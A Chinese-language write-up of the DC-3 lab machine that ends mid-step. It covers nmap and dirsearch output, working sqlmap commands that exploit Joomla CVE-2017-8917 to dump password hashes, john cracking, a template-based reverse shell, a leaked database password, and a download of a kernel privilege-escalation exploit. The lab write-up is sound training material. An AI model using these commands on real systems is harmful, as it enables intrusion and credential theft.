DC-3 靶机

信息收集

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.125
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-10 10:26 EDT
Nmap scan report for 192.168.56.125
Host is up (0.00074s latency).                                                                                      
Not shown: 65534 closed tcp ports (reset)                                                                           
PORT   STATE SERVICE                                                                                                
80/tcp open  http                                                                                                   
MAC Address: 08:00:27:CC:D5:DF (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 9.30 seconds

TCP 只有一个 80 端口开放

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p80 192.168.56.125     
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-10 10:27 EDT
Nmap scan report for 192.168.56.125
Host is up (0.00057s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Home
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:CC:D5:DF (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.27 seconds

使用的是 Joomla, Ubuntu 操作系统。印象中 Joomla 应该有很多漏洞，再看一眼 UDP 扫描

┌──(kali㉿kali)-[~/Downloads/dc_3/rsa/2048]
└─$ sudo nmap --top-ports 20 -sU 192.168.56.125     
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-10 22:39 EDT
Nmap scan report for 192.168.56.125
Host is up (0.00061s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   closed        snmptrap
445/udp   closed        microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  closed        upnp
4500/udp  closed        nat-t-ike
49152/udp closed        unknown
MAC Address: 08:00:27:CC:D5:DF (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 24.92 seconds

的确只有这个端口开放着，nmap 漏洞脚本扫描一下

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p80 192.168.56.125     
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-10 10:28 EDT
Nmap scan report for 192.168.56.125
Host is up (0.00069s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.1.1
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
| http-vuln-cve2017-8917: 
|   VULNERABLE:
|   Joomla! 3.7.0 'com_fields' SQL Injection Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-8917
|     Risk factor: High  CVSSv3: 9.8 (CRITICAL) (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
|       An SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers
|       to execute aribitrary SQL commands via unspecified vectors.
|       
|     Disclosure date: 2017-05-17
|     Extra information:
|       User: root@localhost
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8917
|_      https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.125
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.56.125:80/
|     Form id: login-form
|     Form action: /index.php
|     
|     Path: http://192.168.56.125:80/index.php
|     Form id: login-form
|     Form action: /index.php
|     
|     Path: http://192.168.56.125:80/index.php/component/users/?view=reset&Itemid=101
|     Form id: user-registration
|     Form action: /index.php/component/users/?task=reset.request&Itemid=101
|     
|     Path: http://192.168.56.125:80/index.php/component/users/?view=reset&Itemid=101
|     Form id: login-form
|     Form action: /index.php/component/users/?Itemid=101
|     
|     Path: http://192.168.56.125:80/index.php/2-uncategorised/1-welcome
|     Form id: login-form
|     Form action: /index.php
|     
|     Path: http://192.168.56.125:80/index.php/component/users/?view=remind&Itemid=101
|     Form id: user-registration
|     Form action: /index.php/component/users/?task=remind.remind&Itemid=101
|     
|     Path: http://192.168.56.125:80/index.php/component/users/?view=remind&Itemid=101
|     Form id: login-form
|     Form action: /index.php/component/users/?Itemid=101
|     
|     Path: http://192.168.56.125:80/index.php/component/users/
|     Form id: username-lbl
|     Form action: /index.php/component/users/?task=user.login&Itemid=101
|     
|     Path: http://192.168.56.125:80/index.php/component/users/
|     Form id: login-form
|_    Form action: /index.php/component/users/?Itemid=101
| http-enum: 
|   /administrator/: Possible admin folder
|   /administrator/index.php: Possible admin folder
|   /administrator/manifests/files/joomla.xml: Joomla version 3.7.0
|   /language/en-GB/en-GB.xml: Joomla version 3.7.0
|   /htaccess.txt: Joomla!
|   /README.txt: Interesting, a readme.
|   /bin/: Potentially interesting folder
|   /cache/: Potentially interesting folder
|   /images/: Potentially interesting folder
|   /includes/: Potentially interesting folder
|   /libraries/: Potentially interesting folder
|   /modules/: Potentially interesting folder
|   /templates/: Potentially interesting folder
|_  /tmp/: Potentially interesting folder
MAC Address: 08:00:27:CC:D5:DF (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 327.57 seconds

目录爆破

提到了 cve2017-8917 漏洞，还给出了许多目录和文件，顺便目录爆破一下吧

┌──(kali㉿kali)-[~]
└─$ sudo dirsearch -u http://192.168.56.125  
[sudo] password for kali: 
Sorry, try again.
[sudo] password for kali: 

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.56.125/_23-07-10_10-50-31.txt

Error Log: /root/.dirsearch/logs/errors-23-07-10_10-50-31.log

Target: http://192.168.56.125/

[10:50:31] Starting: 
[10:50:32] 403 -  300B  - /.ht_wsr.txt                                     
[10:50:32] 403 -  303B  - /.htaccess.bak1
[10:50:32] 403 -  305B  - /.htaccess.sample
[10:50:32] 403 -  303B  - /.htaccess.orig
[10:50:32] 403 -  301B  - /.htaccess_sc
[10:50:32] 403 -  303B  - /.htaccess.save
[10:50:32] 403 -  301B  - /.htaccessBAK
[10:50:32] 403 -  303B  - /.htaccess_orig
[10:50:32] 403 -  304B  - /.htaccess_extra
[10:50:32] 403 -  302B  - /.htaccessOLD2
[10:50:32] 403 -  301B  - /.htaccessOLD                                    
[10:50:32] 403 -  293B  - /.htm
[10:50:32] 403 -  294B  - /.html
[10:50:32] 403 -  300B  - /.httr-oauth
[10:50:32] 403 -  299B  - /.htpasswds
[10:50:32] 403 -  303B  - /.htpasswd_test                                  
[10:50:33] 403 -  293B  - /.php                                            
[10:50:33] 403 -  294B  - /.php3                                           
[10:50:36] 200 -   18KB - /LICENSE.txt
[10:50:36] 200 -    4KB - /README.txt
[10:50:42] 301 -  324B  - /administrator  ->  http://192.168.56.125/administrator/
[10:50:42] 403 -  312B  - /administrator/.htaccess
[10:50:42] 200 -    5KB - /administrator/
[10:50:42] 200 -   31B  - /administrator/cache/
[10:50:42] 200 -    2KB - /administrator/includes/
[10:50:42] 200 -    5KB - /administrator/index.php
[10:50:42] 200 -   31B  - /administrator/logs/
[10:50:42] 301 -  329B  - /administrator/logs  ->  http://192.168.56.125/administrator/logs/
[10:50:45] 301 -  314B  - /bin  ->  http://192.168.56.125/bin/
[10:50:45] 200 -   31B  - /bin/
[10:50:45] 301 -  316B  - /cache  ->  http://192.168.56.125/cache/
[10:50:45] 200 -   31B  - /cache/
[10:50:46] 200 -   31B  - /cli/
[10:50:46] 301 -  321B  - /components  ->  http://192.168.56.125/components/
[10:50:46] 200 -   31B  - /components/
[10:50:47] 200 -    0B  - /configuration.php
[10:50:52] 200 -    3KB - /htaccess.txt
[10:50:52] 301 -  317B  - /images  ->  http://192.168.56.125/images/
[10:50:52] 200 -   31B  - /images/
[10:50:52] 301 -  319B  - /includes  ->  http://192.168.56.125/includes/
[10:50:52] 200 -   31B  - /includes/
[10:50:53] 200 -    7KB - /index.php
[10:50:54] 301 -  319B  - /language  ->  http://192.168.56.125/language/
[10:50:54] 200 -   31B  - /layouts/
[10:50:54] 301 -  320B  - /libraries  ->  http://192.168.56.125/libraries/
[10:50:54] 200 -   31B  - /libraries/
[10:50:55] 301 -  316B  - /media  ->  http://192.168.56.125/media/
[10:50:56] 200 -   31B  - /media/
[10:50:56] 301 -  318B  - /modules  ->  http://192.168.56.125/modules/
[10:50:56] 200 -   31B  - /modules/
[10:51:00] 301 -  318B  - /plugins  ->  http://192.168.56.125/plugins/
[10:51:00] 200 -   31B  - /plugins/
[10:51:02] 200 -  836B  - /robots.txt.dist
[10:51:02] 403 -  303B  - /server-status/
[10:51:02] 403 -  302B  - /server-status
[10:51:05] 200 -   31B  - /templates/
[10:51:05] 200 -    0B  - /templates/protostar/
[10:51:05] 200 -    0B  - /templates/beez3/
[10:51:05] 200 -   31B  - /templates/index.html
[10:51:05] 301 -  320B  - /templates  ->  http://192.168.56.125/templates/
[10:51:05] 200 -    0B  - /templates/system/
[10:51:06] 301 -  314B  - /tmp  ->  http://192.168.56.125/tmp/
[10:51:06] 200 -   31B  - /tmp/
[10:51:08] 200 -    2KB - /web.config.txt

Joomla Sql Injection

在 db-exploit 中搜到了响应的漏洞利用脚本，其中给出了如何使用 SQLMap 进行注入

尝试按照上面的命令来操作

┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://192.168.56.125/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://192.168.56.125/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -p list[fullordering] --tables

┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://192.168.56.125/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -p list[fullordering] -T '#__users' --columns

┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://192.168.56.125/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -p list[fullordering] -T '#__users' --dump     
        ___
       __H__                                                                                                        
 ___ ___["]_____ ___ ___  {1.7.6#stable}                                                                            
|_ -| . ["]     | .'| . |                                                                                           
|___|_  ["]_|_|_|__,|  _|                                                                                           
      |_|V...       |_|   https://sqlmap.org                                                                        

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:10:50 /2023-07-10/

[11:10:50] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3' from file '/usr/share/sqlmap/data/txt/user-agents.txt'                 
[11:10:50] [INFO] resuming back-end DBMS 'mysql' 
[11:10:50] [INFO] testing connection to the target URL
[11:10:51] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=k6o2ipqeqht...g5bmibevh0'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[fullordering] (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(7808,CONCAT(0x2e,0x7162786b71,(SELECT (ELT(7808=7808,1))),0x716b766b71),3038))

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 3897 FROM (SELECT(SLEEP(5)))wOhr)
---
[11:10:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[11:10:52] [INFO] fetching columns for table '#__users' in database 'joomladb'
[11:10:52] [WARNING] unable to retrieve column names for table '#__users' in database 'joomladb'
do you want to use common column existence check? [y/N/q] y
[11:10:53] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
which common columns (wordlist) file do you want to use?
[1] default '/usr/share/sqlmap/data/txt/common-columns.txt' (press Enter)
[2] custom
> 
[11:10:54] [INFO] checking column existence using items from '/usr/share/sqlmap/data/txt/common-columns.txt'
[11:10:54] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 
[11:10:56] [WARNING] running in a single-thread mode. This could take a while
[11:10:56] [INFO] retrieved: id                                                                                    
[11:10:56] [INFO] retrieved: name                                                                                  
[11:10:56] [INFO] retrieved: username                                                                              
[11:10:57] [INFO] retrieved: email                                                                                 
[11:11:00] [INFO] retrieved: password                                                                              
[11:11:44] [INFO] retrieved: params                                                                                
                                                                                                                   
[11:11:56] [INFO] fetching entries for table '#__users' in database 'joomladb'
[11:11:56] [INFO] retrieved: 'admin'
[11:11:56] [INFO] retrieved: '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu'
[11:11:56] [INFO] retrieved: 'freddy@norealaddress.net'
[11:11:56] [INFO] retrieved: '629'
[11:11:56] [INFO] retrieved: '{"admin_style":"","admin_language":"","language":"","editor":"","helpsite":"","time...
[11:11:56] [INFO] retrieved: 'admin'
Database: joomladb
Table: #__users
[1 entry]
+-----+--------------------------+--------+----------------------------------------------------------------------------------------------+----------+--------------------------------------------------------------+
| id  | email                    | name   | params                                                                                       | username | password                                                     |
+-----+--------------------------+--------+----------------------------------------------------------------------------------------------+----------+--------------------------------------------------------------+
| 629 | freddy@norealaddress.net | admin  | {"admin_style":"","admin_language":"","language":"","editor":"","helpsite":"","timezone":""} | admin    | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+-----+--------------------------+--------+----------------------------------------------------------------------------------------------+----------+--------------------------------------------------------------+

[11:11:56] [INFO] table 'joomladb.`#__users`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.56.125/dump/joomladb/#__users.csv'                                                                                      
[11:11:56] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2683 times
[11:11:56] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.125'

[*] ending @ 11:11:56 /2023-07-10/

john爆破

拿到了用户密码的哈希值，在线工具没有搜索到，那就使用 john 来破解，同时还发现自己使用 john 命令老师忘记 --wordlist= 最后的 =，hash-identifier 没有识别出识别哈希类型，使用在线工具确定了哈希类型为 bcrypt，但是 --format 中没有这个哈希类型。通过网络搜索发现的确是可以使用 --format=bcrypt 的

┌──(kali㉿kali)-[~/Downloads/dc_3]
└─$ cat passwd 
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

┌──(kali㉿kali)-[~/Downloads/dc_3]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt passwd --format=bcrypt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
snoopy           (?)     
1g 0:00:00:00 DONE (2023-07-10 11:33) 1.086g/s 156.5p/s 156.5c/s 156.5C/s mylove..sandra
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Joomla 后台反弹 shell

使用这个密码登录后台，然后修改模板文件进而将反弹 shell 的代码写入其中

注意访问这个文件的路径为 http://192.168.56.125/templates/beez3/8888.php，可以根据目录爆破的结果辅助判断文件路径

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 443    
[sudo] password for kali: 
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.125] 53722
bash: cannot set terminal process group (1173): Inappropriate ioctl for device
bash: no job control in this shell
www-data@DC-3:/var/www/html/templates/beez3$ whoami
whoami
www-data
www-data@DC-3:/var/www/html/templates/beez3$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@DC-3:/var/www/html/templates/beez3$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:cc:d5:df brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.125/24 brd 192.168.56.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fecc:d5df/64 scope link 
       valid_lft forever preferred_lft forever
www-data@DC-3:/var/www/html/templates/beez3$ uname -a
uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 athlon i686 GNU/Linux
www-data@DC-3:/var/www/html/templates/beez3$ python -c "import pty;pty.spawn('/bin/bash')"
</templates/beez3$ python -c "import pty;pty.spawn('/bin/bash')"

提权

反弹 shell 成功，开始收集文件信息，尤其是配置文件中的数据库密码

www-data@DC-3:/var/www/html$ cat configuration.php
cat configuration.php
<?php
class JConfig {
        public $offline = '0';
        public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.';
        public $display_offline_message = '1';
        public $offline_image = '';
        public $sitename = 'DC-3';
        public $editor = 'tinymce';
        public $captcha = '0';
        public $list_limit = '20';
        public $access = '1';
        public $debug = '0';
        public $debug_lang = '0';
        public $dbtype = 'mysqli';
        public $host = 'localhost';
        public $user = 'root';
        public $password = 'squires';
        public $db = 'joomladb';
        public $dbprefix = 'd8uea_';
        public $live_site = '';
        public $secret = '7M6S1HqGMvt1JYkY';
        public $gzip = '0';
        public $error_reporting = 'default';
        public $helpurl = 'https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}';
        public $ftp_host = '127.0.0.1';
        public $ftp_port = '21';
        public $ftp_user = '';
        public $ftp_pass = '';
        public $ftp_root = '';
        public $ftp_enable = '0';
        public $offset = 'UTC';
        public $mailonline = '1';
        public $mailer = 'mail';
        public $mailfrom = 'freddy@norealaddress.net';
        public $fromname = 'DC-3';
        public $sendmail = '/usr/sbin/sendmail';
        public $smtpauth = '0';
        public $smtpuser = '';
        public $smtppass = '';
        public $smtphost = 'localhost';
        public $smtpsecure = 'none';
        public $smtpport = '25';
        public $caching = '0';
        public $cache_handler = 'file';
        public $cachetime = '15';
        public $cache_platformprefix = '0';
        public $MetaDesc = 'A website for DC-3';
        public $MetaKeys = '';
        public $MetaTitle = '1';
        public $MetaAuthor = '1';
        public $MetaVersion = '0';
        public $robots = '';
        public $sef = '1';
        public $sef_rewrite = '0';
        public $sef_suffix = '0';
        public $unicodeslugs = '0';
        public $feed_limit = '10';
        public $feed_email = 'none';
        public $log_path = '/var/www/html/administrator/logs';
        public $tmp_path = '/var/www/html/tmp';
        public $lifetime = '15';
        public $session_handler = 'database';
        public $shared_session = '0';
}

密码重用

拿到了数据库的密码 squires，到这里我们收集到了两个密码一个是 Joomla 后台密码一个是数据库密码，可以进行简单的密码碰撞，但是经过我的尝试都失败了

www-data@DC-3:/tmp$ su -
su -
Password: 7M6S1HqGMvt1JYkY

su: Authentication failure
www-data@DC-3:/tmp$ su -
su -
Password: squires

su: Authentication failure
www-data@DC-3:/tmp$ su -
su -
Password: snoopy

su: Authentication failure
www-data@DC-3:/tmp$ su dc3
su dc3
Password: snoopy

su: Authentication failure
www-data@DC-3:/tmp$ su dc3
su dc3
Password: squires

su: Authentication failure
www-data@DC-3:/tmp$ su dc3
su dc3
Password: 7M6S1HqGMvt1JYkY

su: Authentication failure

进数据库看看也没什么收获，之前 sqlmap 已经把最关键的信息拿到了。

看看定时任务

www-data@DC-3:/home$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

看看 SUID 文件

www-data@DC-3:/home$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
       91     44 -rwsr-xr-x   1 root     root        43316 May  8  2014 /bin/ping6
     3560    156 -rwsr-xr-x   1 root     root       157424 Mar 15  2019 /bin/ntfs-3g
      125     28 -rwsr-xr-x   1 root     root        26492 Apr 14  2016 /bin/umount
    59924     40 -rwsr-xr-x   1 root     root        38900 May 17  2017 /bin/su
     2220     32 -rwsr-xr-x   1 root     root        30112 Jul 12  2016 /bin/fusermount
       76     36 -rwsr-xr-x   1 root     root        34812 Apr 14  2016 /bin/mount
       90     40 -rwsr-xr-x   1 root     root        38932 May  8  2014 /bin/ping
   139240    104 -rwsr-sr-x   1 root     root       105004 Mar 19  2019 /usr/lib/snapd/snap-confine
   142376     16 -rwsr-xr-x   1 root     root        13960 Jan 15  2019 /usr/lib/policykit-1/polkit-agent-helper-1
     8400     40 -rwsr-xr-x   1 root     root        38300 Mar  8  2017 /usr/lib/i386-linux-gnu/lxc/lxc-user-nic
   139221    504 -rwsr-xr-x   1 root     root       513528 Mar  5  2019 /usr/lib/openssh/ssh-keysign
   138602     48 -rwsr-xr--   1 root     messagebus    46436 Oct 12  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
     9572      8 -rwsr-xr-x   1 root     root           5480 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
    35876     52 -rwsr-xr-x   1 root     root          53128 May 17  2017 /usr/bin/passwd
     8592     36 -rwsr-xr-x   1 root     root          36288 May 17  2017 /usr/bin/newgidmap
    35873     80 -rwsr-xr-x   1 root     root          78012 May 17  2017 /usr/bin/gpasswd
     9659    160 -rwsr-xr-x   1 root     root         159852 May 29  2017 /usr/bin/sudo
    12604     20 -rwsr-xr-x   1 root     root          18216 Jan 15  2019 /usr/bin/pkexec
    35872     40 -rwsr-xr-x   1 root     root          39560 May 17  2017 /usr/bin/chsh
    35874     48 -rwsr-xr-x   1 root     root          48264 May 17  2017 /usr/bin/chfn
     8591     36 -rwsr-xr-x   1 root     root          36288 May 17  2017 /usr/bin/newuidmap
    59923     36 -rwsr-xr-x   1 root     root          34680 May 17  2017 /usr/bin/newgrp
    39144     52 -rwsr-sr-x   1 daemon   daemon        50748 Jan 15  2016 /usr/bin/at

尝试 prng 碰撞

去 gtfobins 中简单对照了一下，没有可以直接利用的点。接下来我又翻了各个文件夹，包括 dc3 用户家目录、网站目录，防止有隐藏文件，不过依然没有收获。也尝试了 ps aux, netstat ano 依然没收获，还尝试了 ssh 公钥prng碰撞。最后开始尝试内核提权和 linpeas

┌──(kali㉿kali)-[~/Downloads/dc_3]
└─$ searchsploit Kernel 4.4 Privilege Escalation 
---------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                    |  Path
---------------------------------------------------------------------------------- ---------------------------------
Apple macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling P | macos/local/40957.c
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Out-of-Bounds Write Privilege Esca | windows/local/42625.py
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Es | windows/local/42624.py
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Es | windows/local/42665.py
Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation         | solaris/local/15962.c
Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Local Privilege Esc | linux/local/19933.rb
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4 | linux/local/9479.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86)  | linux_x86/local/9542.c
Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation                 | linux/local/50135.c
Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Local Privilege E | linux/local/41995.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit)   | linux/local/40759.rb
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privi | linux_x86-64/local/40871.c
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation               | linux/local/41458.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bound | linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Cond | windows_x86-64/local/47170.c
Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege | linux/local/39277.c
Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege | linux/local/40003.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege | linux/local/39772.txt
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation                        | linux/local/41886.c
Linux Kernel < 3.4.5 (Android 4.2.2/4.4 ARM) - Local Privilege Escalation         | arm/local/31574.c
Linux kernel < 4.10.15 - Race Condition Privilege Escalation                      | linux/local/43345.c
Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation | linux/local/45553.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation     | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation            | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Priv | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escal | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - L | linux/local/47169.c
Sony Playstation 4 (PS4) < 7.02 / FreeBSD 9 / FreeBSD 12 - 'ip6_setpktopt' Kernel | hardware/local/48644.c
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

内核提权

根据 4.4.0-21 的内核版本号，以及 /etc/issue 展示出的 Ubuntu 16.04

www-data@DC-3:/tmp$ cat /etc/issue
cat /etc/issue
Ubuntu 16.04 LTS \n \l

我依次尝试了，除此之外还尝试了 linpeas 给出的可能性比较高的脏牛漏洞

Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit)   | linux/local/40759.rb

Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privi | linux_x86-64/local/40871.c

Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation               | linux/local/41458.c

Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bound | linux_x86-64/local/40049.c

Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Cond | windows_x86-64/local/47170.c

Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege | linux/local/39277.c

Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege | linux/local/39772.txt

最后 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege 提权成功，按照文件中的步骤

┌──(kali㉿kali)-[~/Downloads/dc_3]
└─$ wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
--2023-07-10 23:39:42--  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
Resolving gitlab.com (gitlab.com)... 172.65.251.78, 2606:4700:90:0:f22e:fbec:5bed:a9b9
Connecting to gitlab.com (gitlab.com)|172.65.251.78|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/octet-stream]
Saving to: ‘39772.zip’

